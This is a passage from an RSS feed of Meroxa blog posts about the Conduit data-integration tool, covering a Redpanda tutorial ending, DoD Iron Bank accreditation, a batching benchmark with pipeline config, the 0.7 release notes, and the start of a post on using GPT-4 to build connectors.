&lt;li&gt;Navigate to &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;http://localhost:8080&lt;/code&gt;&lt;/strong&gt; to check Conduit&apos;s UI and you should see the following:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Conduit-Redpanda%20Blog%20Post_09062023_Image%203.png&quot; alt=&quot;Conduit-Redpanda Blog Post_09062023_Image 3&quot;&gt;&lt;/p&gt;
&lt;p&gt;You can view the data flowing through the Redpanda topic by opening up a new terminal window and running the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic consume conduit-demo &lt;span class=&quot;token parameter variable&quot;&gt;--brokers&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker1_addr,broker2_addr,broker3_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If everything works correctly, viewing the contents of &lt;code class=&quot;language-text&quot;&gt;output.txt&lt;/code&gt; should show the same information in the topic.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Conduit and Redpanda offer an alternative that is not only easier on your development team but also on your infrastructure. They eliminate the operational overhead and complexity, freeing you to focus on what really matters—your data and how it drives your business. So if you&apos;re looking to make the switch to a more efficient, developer-friendly platform, look no further. Conduit and Redpanda are not just the future of data streaming; they&apos;re the smarter choice for today.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Additional Resources&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;For more information, visit the &lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/&quot;&gt;Conduit Documentation&lt;/a&gt; and &lt;a href=&quot;https://docs.redpanda.com/&quot;&gt;Redpanda&lt;/a&gt;&lt;a href=&quot;https://docs.redpanda.com/&quot;&gt;Documentation&lt;/a&gt;. Join our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community forums&lt;/a&gt; to stay up-to-date and get answers to all your questions.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit Accredited in Iron Bank DoD Centralized Artifacts Repository]]></title><description><![CDATA[Visit conduit.io to download and learn how to use Conduit, the secure and efficient open-source data integration tool accredited by the DoD Iron Bank.]]></description><link>https://meroxa.com/blog/conduit-accredited-in-iron-bank-dod-centralized-artifacts-repository</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-accredited-in-iron-bank-dod-centralized-artifacts-repository</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Mon, 28 Aug 2023 15:55:31 GMT</pubDate><content:encoded>&lt;p&gt;In our ongoing efforts to support the U.S. Department of Defense (DoD) with high-performing products and services, we were confronted with an operational challenge. Each time we started a new project, Conduit, our open-source data integration tool had to undergo a thorough security review process, a requirement dictated by the DoD&apos;s stringent security standards for all vendors. This caused considerable delays to the start of each new project we were involved with and hindered our ability to secure new projects within the department.&lt;/p&gt;
&lt;p&gt;We needed a solution to expedite the availability of Conduit and make project initiations more efficient. Therefore, we decided to submit Conduit to a trusted repository run by Iron Bank, a government contractor.&lt;/p&gt;
&lt;p&gt;Having successfully gone through the rigorous testing by Iron Bank, Conduit has bypassed the lengthy and recurring security review processes that would happen on individual engagements with different groups in various agencies. As a result of Conduit&apos;s full compliance by Iron Bank, Meroxa can now give the DoD access to this essential tool right away, significantly speeding up project operations.&lt;/p&gt;
&lt;p&gt;Read on to learn more about Iron Bank’s security clearance process and what it says about the security of Conduit.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What is Iron Bank?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://software.af.mil/dsop/services/&quot;&gt;Iron Bank&lt;/a&gt; is a DoD repository of digitally signed, binary container images including both Free and Open-Source Software (FOSS) and Commercial Off-The-Shelf (COTS) software. It is a centralized repository for container images that have been hardened and evaluated for security. This makes it easier for DoD organizations to find and use secure container images, and to quickly and easily deploy applications. Approved containers in Iron Bank have DoD-wide reciprocity across all classifications, accelerating down to weeks a security process that can otherwise take months or even years.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why Go the Iron Bank Route?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The DoD was interested in using Conduit to build connections within the Department of the Air Force (DAF) Data Fabric and between disparate systems to bridge gaps. However, Conduit had not been through the specific group’s software review and compliance process, which could have taken months to complete…months we didn’t have. To move forward rapidly and to set Meroxa up for success in the future, placing Conduit in Iron Bank made the most sense. By going the Iron Bank route, we were quickly able to get Conduit in Iron Bank and subsequently scanned and approved for use with flying colors in under a week.&lt;/p&gt;
&lt;p&gt;Another benefit of having Conduit in Iron Bank is accessibility - being able to direct other DoD teams to an approved version of Conduit that they can download and use the same day without issue is a game changer. Long gone are the days of us going through various different approval processes for different projects to get the same outcome.&lt;/p&gt;
&lt;p&gt;In addition to what was mentioned above, here are some other benefits to having your software in Iron Bank for the purpose of working with the DoD:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Increased security: Iron Bank container images are hardened and evaluated for security, which helps reduce the risk of vulnerabilities being introduced into DoD applications.&lt;/li&gt;
&lt;li&gt;Increased efficiency: Iron Bank centralizes the process of finding and using secure container images, which saves DoD organizations time and resources.&lt;/li&gt;
&lt;li&gt;Reduced risk: Iron Bank helps reduce the risk of DoD applications being compromised by vulnerabilities.&lt;/li&gt;
&lt;li&gt;Improved compliance: Iron Bank helps DoD organizations comply with security regulations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With those benefits in mind, you can see how having our offerings in Iron Bank would bring our customers peace of mind and allow both parties to not spend huge amounts of time and money on software reviews and testing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Strengths of Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We’ve touched a bit on how we’re using Conduit in the DoD to build data pipelines with the DAF Data Fabric, but I wanted to list out some other reasons why the DoD has opted to use Conduit in lieu of other products.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Efficient Binary Protocol&lt;/strong&gt; - Uses a binary encoding format that is smaller and faster to serialize and deserialize compared to other formats. This makes it an efficient choice for transmitting large amounts of data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bi-directional Stream Support&lt;/strong&gt; - The client and server can read and write messages in any order, as the two streams are independent.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resilient Connectivity&lt;/strong&gt; - Conduit is able to provide and maintain an acceptable level of service in the face of faults and challenges to normal operation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rate Limiting/Traffic Shaping&lt;/strong&gt; - Controls the flow and distribution of traffic from the internet so your infrastructure never becomes overloaded and risks failing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;End-to-End Encryption&lt;/strong&gt; - Keeps communications secure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lightweight&lt;/strong&gt; - Can be compiled down to a binary that’s single-digit megabytes and connectors use megabytes of RAM. In comparison, Kafka Connect is roughly 500 - 600 megabytes for all of the packages, connectors, etc. For example, a single Postgres, can consume close to a gigabyte of RAM on its own.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With all of the benefits of Conduit plus the assurance of knowing that it’s a secure and compliant piece of software, it’s clear why the government has opted to use us.&lt;/p&gt;
&lt;p&gt;If you are a developer working for the Department of Defense and need access to Conduit, you can download it from Iron Bank and install it right into your development environment. Federal government agencies and DoD DevSecOps teams always have access to the latest, accredited version of Conduit, which has been fully vetted and approved for deployment by the DoD Iron Bank DevSecOps team. For those outside of the DoD who are interested in Conduit, visit &lt;a href=&quot;https://conduit.io/&quot;&gt;conduit.io&lt;/a&gt; here to download and view documentation on how to use Conduit.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Harnessing the Power of Batching in Conduit Connectors]]></title><description><![CDATA[Explore batching in Conduit connectors for improved data pipeline performance. Understand how it boosts throughput and scalability.]]></description><link>https://meroxa.com/blog/conduit-harnessing-the-power-of-batching</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-harnessing-the-power-of-batching</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 23 Aug 2023 18:10:20 GMT</pubDate><content:encoded>&lt;p&gt;The performance of Conduit data pipelines directly depends on the efficiency of connectors. As the ecosystem of Conduit connectors expanded across various data resources, we recognized the need for a robust and scalable solution that could boost performance uniformly across all connectors. In this blog post, we explore the impact of implementing batching in the Conduit connector SDK, which emerged as the perfect solution promising to elevate the performance of our connectors to the next level.&lt;/p&gt;
&lt;p&gt;While our motivation was to enhance the performance of any destination connector, we selected the Postgres connector as a focal point to showcase the results that batching could deliver. Batching unlocked the true potential of the connector, improving the processing rate by a factor of 20. Bear in mind that similar improvements can be expected in other connectors.&lt;/p&gt;
&lt;h2&gt;Understanding Batching&lt;/h2&gt;
&lt;p&gt;The efficiency of record processing plays a critical role in the overall performance of data pipelines. Batching is a powerful technique that can significantly improve connector performance. In this section, we delve into the concept of batching, its inner workings, and the benefits it brings to data processing.&lt;/p&gt;
&lt;h3&gt;What is Batching?&lt;/h3&gt;
&lt;p&gt;Batching involves grouping multiple data records together and processing them as cohesive units. Instead of handling individual records one by one, batching allows us to bundle operations, such as database queries or API calls, into a single larger request.&lt;/p&gt;
&lt;p&gt;The beauty of batching lies in its ability to reduce the overhead incurred by processing individual requests separately. By aggregating multiple requests into a single batch, we significantly reduce the number of round trips between the connector and the data resource, minimizing the latency associated with each operation.&lt;/p&gt;
&lt;h3&gt;Benefits of Batching&lt;/h3&gt;
&lt;p&gt;Batching offers wide-ranging benefits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduced network overhead&lt;/strong&gt;: Batching considerably reduces the number of network requests, lowering the overall network overhead and enhancing the efficiency of data transmission.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved throughput&lt;/strong&gt;: Batching enables connectors to process a larger volume of data requests simultaneously, boosting the overall throughput of data pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reduced latency&lt;/strong&gt;: This one may be counter-intuitive, but batching can actually reduce the latency when the rate of produced records gets closer to the limit of the non-batching approach. Fewer round trips between the connector and the data resource result in a higher throughput thus reducing the average latency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced scalability&lt;/strong&gt;: By optimizing the processing of multiple records in batches, the connector becomes more scalable as it reduces the pressure on the destination resource.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource optimization&lt;/strong&gt;: Batching reduces the strain on system resources, allowing for more efficient utilization of server capacity, computing power and network bandwidth.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Versatility of Batching&lt;/h3&gt;
&lt;p&gt;One of the key advantages of batching lies in its adaptability across various types of connectors and resources. Whether connecting to relational databases like Postgres, NoSQL databases, APIs, or other data systems, batching can be applied as a unifying performance enhancement strategy regardless of the data resource.&lt;/p&gt;
&lt;h3&gt;Implementing Batching in the Connector SDK&lt;/h3&gt;
&lt;p&gt;In this section, we delve into the nitty-gritty of implementing batching in the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt;. We will explore the technical intricacies, design considerations, and challenges faced during this process.&lt;/p&gt;
&lt;h2&gt;No breaking changes&lt;/h2&gt;
&lt;p&gt;*“Forethought spares afterthought.” -*Amelia E. Barr&lt;/p&gt;
&lt;p&gt;When we designed the Connector SDK interfaces, we had the foresight that there would come a time when implementing batching would be crucial for achieving optimal performance in destination connectors. Therefore, we laid the groundwork by preparing the interface to handle batches, even though the SDK initially only provided a single record per batch. This forward-thinking approach allowed us to seamlessly implement batching in the Connector SDK without the need for breaking changes.&lt;/p&gt;
&lt;p&gt;The interface draws inspiration from Go&apos;s &lt;a href=&quot;https://pkg.go.dev/io#Writer&quot;&gt;io.Writer&lt;/a&gt; and provides developers with a familiar and intuitive way to work with batches. Here&apos;s the relevant interface definition:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;type Destination interface {
    // Write writes len(r) records from r to the destination right away without
    // caching. It should return the number of records written from r
    // (0 &amp;lt;= n &amp;lt;= len(r)) and any error encountered that caused the write to
    // stop early. Write must return a non-nil error if it returns n &amp;lt; len(r).
    Write(ctx context.Context, r []Record) (n int, err error)
}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This interface makes the Connector SDK responsible for collecting records into batches, allowing the behavior to be centralized and tested without the need to repeat it in individual connectors.&lt;/p&gt;
&lt;h3&gt;Batching middleware&lt;/h3&gt;
&lt;p&gt;In the &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#hdr-Destination&quot;&gt;Connector SDK documentation&lt;/a&gt; we encourage developers to include the default middleware unless they have a very good reason not to. Most connectors therefore benefit from new middleware as soon as they update to a new SDK version. We used this to our advantage by adding a new batching middleware that enables the batching behavior in virtually all connectors.&lt;/p&gt;
&lt;h3&gt;Batching strategies&lt;/h3&gt;
&lt;p&gt;The middleware introduced in the previous section injects two parameters into the connector specifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sdk.batch.size&lt;/code&gt; - This option sets the maximum number of records in a batch. Once a record is added to the batch and the limit is reached, the whole batch gets flushed synchronously to the destination connector.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sdk.batch.delay&lt;/code&gt; - The maximum delay before an incomplete batch is written to the destination. The delay is measured from the time the first record gets added to the batch. This option essentially controls the maximum latency added to a record because of batching.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These strategies ensure users can tailor the batching behavior to suit their specific needs and optimize performance accordingly. If you are interested in the internals of these strategies you&apos;re welcome to take a look at the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk/blob/main/internal/batcher.go&quot;&gt;batcher implementation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Transactional integrity and error handling&lt;/h3&gt;
&lt;p&gt;In Conduit, all records are strictly ordered. This guarantee extends to batches, where records in a batch maintain their order from the oldest (received first) to the youngest (received last). The connector is free to decide if it wants to store all records in a single transaction or treat them independently, however, it needs to write the records in the correct order. This means that, in the event of a failure, a connector can fail to write part of the batch, as long as there&apos;s an index that divides the batch into two parts: successfully written records should be to the left of that index, while failed records are to the right.&lt;/p&gt;
&lt;p&gt;In case of a failure the connector can return the number of successfully written records and an error. The SDK will positively acknowledge the first n records and use the error to negatively acknowledge the rest. Only if the number of successfully written records matches the size of the batch, is the write considered completely successful.&lt;/p&gt;
&lt;p&gt;If the connector follows this behavior, Conduit is able to guarantee the correct order of records in the data pipeline and at-least-once delivery of all records.&lt;/p&gt;
&lt;h2&gt;Benchmarking using the Postgres Connector&lt;/h2&gt;
&lt;p&gt;With the batching implementation in place, it was time to put it to the test. We conducted benchmarks using the Postgres connector to evaluate the impact of different batch sizes on throughput and latency.&lt;/p&gt;
&lt;h3&gt;Configuring the pipeline&lt;/h3&gt;
&lt;p&gt;We decided to run a simple pipeline that uses the built-in &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator&lt;/a&gt; connector as the source and the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Postgres&lt;/a&gt; connector as the destination. The generator constantly produces records as fast as possible, which makes the throughput of the pipeline completely dependent on the throughput of the destination connector.&lt;/p&gt;
&lt;p&gt;We tested the pipeline with different batch sizes, from 1 (no batching) to 10, 100, 1,000 and 10,000.&lt;/p&gt;
&lt;p&gt;Here is the configuration file for the pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;version: 2.0
pipelines:
  - id: generator-to-pg
    status: running
    connectors:
      - id: gen
        type: source
        plugin: builtin:generator
        settings:
          format.type: structured
          format.options: &quot;id:int,first_name:string,last_name:string&quot;
      - id: pg
        type: destination
        plugin: builtin:postgres
        settings:
          url: &quot;postgres://meroxauser:meroxapass@localhost:5432/meroxadb?sslmode=disable&quot;
          table: &quot;batch_test&quot;
          # Tested batch sizes: 1 (no batching), 10, 100, 1000, 10000.
          sdk.batch.size: 1000
          # Batch delay is not relevant, records are constantly produced and
          # flushed before the delay is reached.
          sdk.batch.delay: 1s
    processors:
      # The generator produces a raw key, we use a processor to hoist it
      # into a structured payload, needed by the Postgres connector.
      - id: hoist
        type: hoistfieldkey
        settings:
          field: &quot;key&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We also prepared the table in the target database in advance:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;CREATE TABLE batch_test (
  id int,
  first_name varchar(255),
  last_name varchar(255),
  key varchar(255)
);&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Collecting metrics&lt;/h3&gt;
&lt;p&gt;When running the pipelines we were collecting and monitoring &lt;a href=&quot;https://conduit.io/docs/features/metrics&quot;&gt;Conduit metrics&lt;/a&gt; using &lt;a href=&quot;https://prometheus.io/&quot;&gt;Prometheus&lt;/a&gt; and &lt;a href=&quot;https://grafana.com/&quot;&gt;Grafana&lt;/a&gt;. We mainly focused on the metric &lt;code class=&quot;language-text&quot;&gt;conduit_pipeline_execution_duration_seconds&lt;/code&gt;. This is a collection of metrics that together represent a &lt;a href=&quot;https://prometheus.io/docs/concepts/metric_types/#histogram&quot;&gt;Prometheus histogram&lt;/a&gt; tracking the duration a single record spends in the pipeline, from the time it is received by the source to the time it is acknowledged by the destination.&lt;/p&gt;
&lt;p&gt;We monitored the metric using two Grafana graphs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;a href=&quot;https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/heatmap/&quot;&gt;heatmap&lt;/a&gt; showing the end-to-end latencies of records traveling through the pipeline.&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/time-series/&quot;&gt;time series&lt;/a&gt; line graph showing the throughput of the pipeline in records per second over time.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in graphing these values for your Conduit instance have a look at &lt;a href=&quot;https://github.com/conduitio-labs/prom-graf&quot;&gt;conduitio-labs/prom-graf&lt;/a&gt;, a simple project that provides the necessary services and pre-configured dashboards.&lt;/p&gt;
&lt;h3&gt;Results&lt;/h3&gt;
&lt;p&gt;We ran the benchmarks on a 2019 MacBook Pro with a 2,3 GHz 8-Core Intel Core i9 processor and 32GB RAM. Each pipeline ran for exactly 1 minute on a clean slate (fresh database and fresh Conduit instance).&lt;/p&gt;
&lt;p&gt;The results speak for themselves:&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Screenshot%202023-08-23%20at%203.07.08%20PM.png&quot; alt=&quot;Harnessing the Power of Batching in Conduit Connectors: Throughput and Latency Table&quot;&gt;&lt;/p&gt;
&lt;p&gt;Here is the same data represented in a graph:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/5SL6aBtVk9jQ7fgQLcS2SBrYu8vFso3r2Pc-mBHkmTfr8Szbt0B0Wp12QK_lFHTZZ3afw1ak9tBi3AmgxmG7r6dkulCgHAMswUN7wtX-fzzkim0UzeZuT4R6vlg3r-urBSpz7edRvtke5oW3mmdz4js&quot; alt=&quot;Harnessing the Power of Batching in Conduit Connectors: Throughput and Latency Chart&quot;&gt;&lt;/p&gt;
&lt;p&gt;Throughput&lt;/p&gt;
&lt;p&gt;We can observe the throughput starting at 822 records per second with batching disabled and increasing to over 16,000 records with a batch size of 10,000. That&apos;s an increase of throughput by a factor of 20!&lt;/p&gt;
&lt;p&gt;The biggest jump in throughput can be seen in the first step when we increased the batch size from 1 to 10. It improved the performance of the pipeline by a factor of 6.5. The next step going to 100 further improved the performance by a factor of 2.4. Further increases of the batch size still had a noticeable effect, although not as extreme as the first two steps.&lt;/p&gt;
&lt;p&gt;Latency&lt;/p&gt;
&lt;p&gt;The common assumption might be that batching inherently increases latency, as records are held to be flushed together. This holds true when the incoming record stream is relatively slow. However, as the workload increases, the latency can rise sharply when records start waiting on previous ones to be flushed. In such scenarios, batching can actually reduce latency while improving throughput by minimizing these waiting times.&lt;/p&gt;
&lt;p&gt;This graph demonstrates when batching can improve the latency:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/nzdwYf1qa8oTvhOKyGjWBmzmvUeEwun4UpcfGFLFZGfYyxCzWCAdI-XwIjBw7vkuvsPI2QlqxoQE0IEqpebyk7t7DUHW4b5B19yK79WCEvpt0CwCLfPlzoPgwAwOtQAPb5UdqxPoLtL7fF_LCCg8PeE&quot; alt=&quot;Harnessing the Power of Batching in Conduit Connectors: Throughput and Latency Graph&quot;&gt;&lt;/p&gt;
&lt;p&gt;This is exactly what we observed in our results. Enabling batches with a batch size of 10 dropped the latency from 13.7ms to 3.5ms. Further increases in the batch size also increased the latency, as bigger batches naturally increase the time it takes to collect a batch and flush it. A batch size of 100 still had a lower latency compared to the pipeline without batching, although we observed a sharp increase of the latency for batch sizes 1,000 and 10,000.&lt;/p&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;The benchmark results conclusively demonstrate that batching plays a pivotal role in improving the performance of our connectors. With larger batch sizes, we achieved substantially higher throughput and in some cases even lower average latencies, which translates into faster data processing overall.&lt;/p&gt;
&lt;p&gt;We found that the optimal batch size for significant performance gains was around 100. At this batch size, the throughput showed a notable increase compared to the non-batching configuration (&gt;15x), and the average latency was halved. While larger batch sizes continued to enhance pipeline throughput, they also incurred higher latency, thus the decision to use a higher batch size would depend on the priorities of the specific use case. If higher throughput is more important than low latencies, higher batch sizes would still be applicable.&lt;/p&gt;
&lt;p&gt;The decision on what batch size to use is ultimately in your hands as the user. It will depend on different factors like the expected amount of records per second, the size of the records, the spikiness of the load, what latency is acceptable, etc. You need to carefully think about these factors and, if possible, gather actual information about the incoming data stream to make an educated decision about the appropriate batch size.&lt;/p&gt;
&lt;h2&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;Looking back on our decision to implement batching, we recognize that it has positioned the Connector SDK for the future. Batching provides the scalability, efficiency and flexibility needed to handle high-load pipelines. With this feature, we are able to lower the latencies as well as increase the throughput in virtually every destination connector across the board.&lt;/p&gt;
&lt;p&gt;We encourage you to try out &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; and let us know what you think!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.7]]></title><description><![CDATA[Conduit 0.7 gets us one step closer to being a full functioning, feature rich alternative to Kafka Connect.]]></description><link>https://meroxa.com/blog/conduit-0.7-is-here</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.7-is-here</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 19 Jul 2023 04:15:00 GMT</pubDate><content:encoded>&lt;p&gt;Welcome to another release of Conduit! We’ve always thought of Conduit as a Kafka Connect replacement that could do so much more, like move data and run elaborate pipelines. In this release, we get closer to that original goal of a Kafka Connect replacement with our biggest feature, Native Schema Registry support.&lt;/p&gt;
&lt;p&gt;Native Schema Registry Support&lt;/p&gt;
&lt;p&gt;A schema registry is a great tool to store metadata about the information flowing through pipelines. The metadata can contain information about what fields are required, which fields are optional, and enforce data types. Also, the data in a pipeline can be encoded in a more space efficient format if you have a schema. As a developer, this allows you to be more confident that what gets sent into the pipeline is what you’re expecting.&lt;/p&gt;
&lt;p&gt;We’re excited to announce &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/984&quot;&gt;native schema registry support&lt;/a&gt; in Conduit. Interacting with a schema registry within a Conduit pipeline is done via one of four built-in processors:&lt;/p&gt;
&lt;p&gt;-&lt;a href=&quot;https://conduit.io/docs/processors/builtin#decodewithschemakey&quot;&gt;Decode with Schema Key&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;-&lt;a href=&quot;https://conduit.io/docs/processors/builtin#decodewithschemapayload&quot;&gt;Decode with Schema Payload&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;-&lt;a href=&quot;https://conduit.io/docs/processors/builtin#encodewithschemakey&quot;&gt;Encode with Schema Key&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;-&lt;a href=&quot;https://conduit.io/docs/processors/builtin#encodewithschemapayload&quot;&gt;Encode with Schema Payload&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;To add the ability to your pipeline, all you need to do is call one of the aforementioned methods in your pipeline within the processors section:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;processors:
  id:   example
  type: decodewithschemakey
  settings:
    url:                 &quot;http://localhost:8085&quot;
    auth.basic.username: &quot;user&quot;
    auth.basic.password: &quot;pass&quot;
    tls.ca.cert:         &quot;/path/to/ca/cert&quot;
    tls.client.cert:     &quot;/path/to/client/cert&quot;
    tls.client.key:      &quot;/path/to/client/key&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Currently, the built-in schema registry processors only supports Avro but we’re looking to include more formats in future releases, like protobuf and JSON schema.&lt;/p&gt;
&lt;p&gt;gRPC Connector&lt;/p&gt;
&lt;p&gt;While not necessarily part of Conduit itself, we’re excited to announce&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-grpc-server&quot;&gt;gRPC Server&lt;/a&gt; and&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-grpc-client&quot;&gt;Client&lt;/a&gt; Conduit connectors. This is super interesting because it now allows Conduit to be used in distributed environments. For example, let’s say you need to aggregate in one place and forward it to another site.&lt;img src=&quot;https://lh4.googleusercontent.com/aKffuM5aNGpAKrgIc_dTFLOLESmIXdBYvnAyXWMj3ZNEXmgCxC84sU17CFBbwLGmb4D_81OkeJQAmIQSOPXVkQTz0uS8d7Dpz1Zq-vLdteV5i9XzZXOCvz4syjIJjh0mg3FuRQw2gd3axpbbv-F5VrA&quot; alt=&quot;gRPC Connector diagram&quot;&gt;The image demonstrates that you can have one Conduit running on Remote Site A and using the Conduit gRPC Server and Client Connectors, you can forward the data to Remote Site B. This is functionality we use internally to move data between regions within AWS. There are still a number of features to be added to these connectors, but it’s a start at enabling these distributed scenarios.&lt;/p&gt;
&lt;p&gt;We’d love your feedback too!&lt;/p&gt;
&lt;p&gt;As always, we’d love to get your feedback! If you want to see the full list of what is included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.7.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Streaming Data Connectors Faster with OpenAI’s GPT-4]]></title><description><![CDATA[Learn how OpenAI's GPT-4 has helped to streamline data connector building for Meroxa, reducing development time and effort.]]></description><link>https://meroxa.com/blog/building-connectors-faster-openai-gpt-4</link><guid isPermaLink="false">https://meroxa.com/blog/building-connectors-faster-openai-gpt-4</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Fri, 02 Jun 2023 13:53:16 GMT</pubDate><content:encoded>&lt;p&gt;The responsibility of connecting different data stores has historically fallen to an entire team of developers who write custom code and manage complex data integrations. Conduit, an open-source project powered by Meroxa, has made this undertaking a lot simpler. We designed the Conduit SDK with data movement best practices in mind, requiring fewer developers to build out pipelines with the same level of efficacy but with greater efficiency. If you’re unfamiliar, Conduit is a data integration tool for developers built with the purpose of moving data from point A to point B and it does this via the use of connectors. By adding Open AI’s GPT-4 into the mix to speed up the build of connectors, connecting data sources has become a breeze for us. In this blog post, we’ll go over why speeding up connector building was necessary and how we were able to accomplish it via GPT-4.&lt;/p&gt;
&lt;h2&gt;Why Did We Need to Reduce Connector Build Time?&lt;/h2&gt;
